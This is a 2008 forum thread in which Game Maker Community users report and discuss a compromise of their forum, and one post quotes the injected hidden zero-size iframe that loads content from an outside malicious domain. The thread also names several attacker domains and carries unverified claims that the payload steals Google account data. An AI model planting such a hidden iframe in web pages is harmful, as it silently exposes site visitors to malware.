Malware Alert, Malware warning when visiting gmc.yoyogames.com Options

[Hach-Que]

While browsing the GMC in Google Chrome, I suddenly got a malware warning from my browser. You'll only see this notice in Google Chrome, but I've checked with other people on my IM list, and they are receiving the same notice.


UPDATE:
Christian Sciberras has found the location of the "hack".

<a href="http://www.yoyogames.com/make">Game Maker Home <iframe src="http://yourtraff.biz/tds/in.cgi?20" width="0" height="0" style="display:none"></iframe></a>

UPDATE 2:
Firefox does show the warning, except they show it in the IFrame, whereas Google Chrome shows it over the entire site rendering, so it's only picked up in Google Chrome.

UPDATE 3:
If you are using Internet Explorer, then you are vunerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.



This post has been edited by Hach-Que: Sep 7 2008, 12:23 PM

[uuf6429]

The hack is there on all browsers.

I was just browsing this, so I say the site got hacked in the last 5 minutes or so (1:10PM).


IMPORTANT:
I suggest the forums are shutdown temporally.

This post has been edited by uuf6429: Sep 7 2008, 12:14 PM

[Hach-Que]

I'm quite well aware of this; the warning is only visible in Google Chrome though.

[hiro-niro]

I thought they couldn't even use Iframe tags on IBM fourms? Can't the Admins just disable Iframes?

[uuf6429]

It was not created by any user.

The iframe is embedded inside the forum code.

This post has been edited by uuf6429: Sep 7 2008, 12:19 PM

[osl]

I got it. Luckily my firewall and antivirus stopped it. It comes up telling me, and saying jar cache... then a certain number??? It seems like the gmc is under attack

EDIT: It says loading from yourtraff.biz at the bottom? and augreat.mine.nu

This post has been edited by osl: Sep 7 2008, 12:41 PM

[uuf6429]

Now, now don't go on inventing theories.
This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically weaped out.


Edit: It seems to have been fixed.
Edit: No it's back :S

This post has been edited by uuf6429: Sep 7 2008, 12:27 PM

[osl]

Now, now don't go on inventing theories.
This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically weaped out.

Its not a theory. Try refreshing the main page and then look at the bar just above the windows star bar. Then it does say downloading from sites other than the ones I'm on
Edit: It isn't fixed on mine

This post has been edited by osl: Sep 7 2008, 12:28 PM

[uuf6429]

Hehe why do you think it's malware?
It's got to download something to actually attack your computer.

Fortunately, my good ol' software does a good job keeping out the bad sh*t.

[spacerat]

God damn you beat me to it, I was going to create a topic about this
Well I'll include a screen shot anyway for good measure.

EDIT:

If you are using Internet Explorer, then you are vunerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.

Wrong. The only correct advice is:

If you are using Internet Explorer: Use another browser.


This post has been edited by spacerat: Sep 7 2008, 12:42 PM

[uuf6429]

WARNING!!

Everybody leave this forum now!!
I just analayzed their code, and it seems that just by letting this thing running (without an on-access scanner like Avast's) it will grab pages containing info from google services including:
Gmail
GAnalytics
Orkut

This post has been edited by uuf6429: Sep 7 2008, 12:41 PM

[Tuntis]

Is it just me or do I recall this happening many times before?

[spacerat]

WARNING!!

Everybody leave this forum now!!
I just analayzed their code, and it seems that just by letting this thing running (without an on-access scanner like Avast's) it will grab pages containing info from google services including:
Gmail
GAnalytics
Orkut

Can you prove this?

[Un_t0uch]

It just happened today.
I was browsing GMC yesterday and it didn't happen.

EDIT:

the site is rivatos.net, now.

This post has been edited by Un_t0uch: Sep 7 2008, 12:49 PM

[uuf6429]

Is it just me or do I recall this happening many times before?

There's been other attempts, but shouldn't each new hack be fixed?
The point is, with this they can do anything on the forum at the moment.
Most browsers follow iframes blindly. Only an antivirus can stop them. Unless it's a special browser like Chrome.

Can you prove this?

Try downloading their code. Then using some common sense (and knowldge of javascript), decode the existing obfuscated javascript into normal javascript. Keep doing this for all new links (of course DO NOT browse the links with your browser).
Finally, you may follow up to pages which show your gmail messages (for example).

Edit: @Un_t0uch: The main site is "yourtraff.biz" but it keeps making new iframes to other sites like the one you mentioned. There is one tiny hole: the iframe. Through it, any other site affiliated/related to "yourtraff.biz" can add their own code.
What triggered this notice is the virus on "rivatos.net". But as said, the hole is elsewhere.

This post has been edited by uuf6429: Sep 7 2008, 12:55 PM

[NickToony]

It's stopped showing the message for me in Chrome

[them4n!ac]

I see this too..
This proves that we can't live without an antivirus because some idiots think they're smart and edit the page.
I hate them all.

[uuf6429]

AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.

[osl]

It is still in Internet explorer, but it seems like it is from a variety of sites. rivatos.net, augreat.mine.nu and yourtraff.biz seem as if they are behind it. And anytime I upload one of these pages... multiple trojans appear

AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.

I still get it... even though I've removed rivatos.net.
I advise everyone to block augreat.mine.nu too

This post has been edited by osl: Sep 7 2008, 01:05 PM

[samscam]

Damn, I just wanted to make a topic about it I hope Smarty (Because his comment is below that code) will do something about it, and I hope it will happen fast, because it's annoying. I wonder why there's still no admin reaction...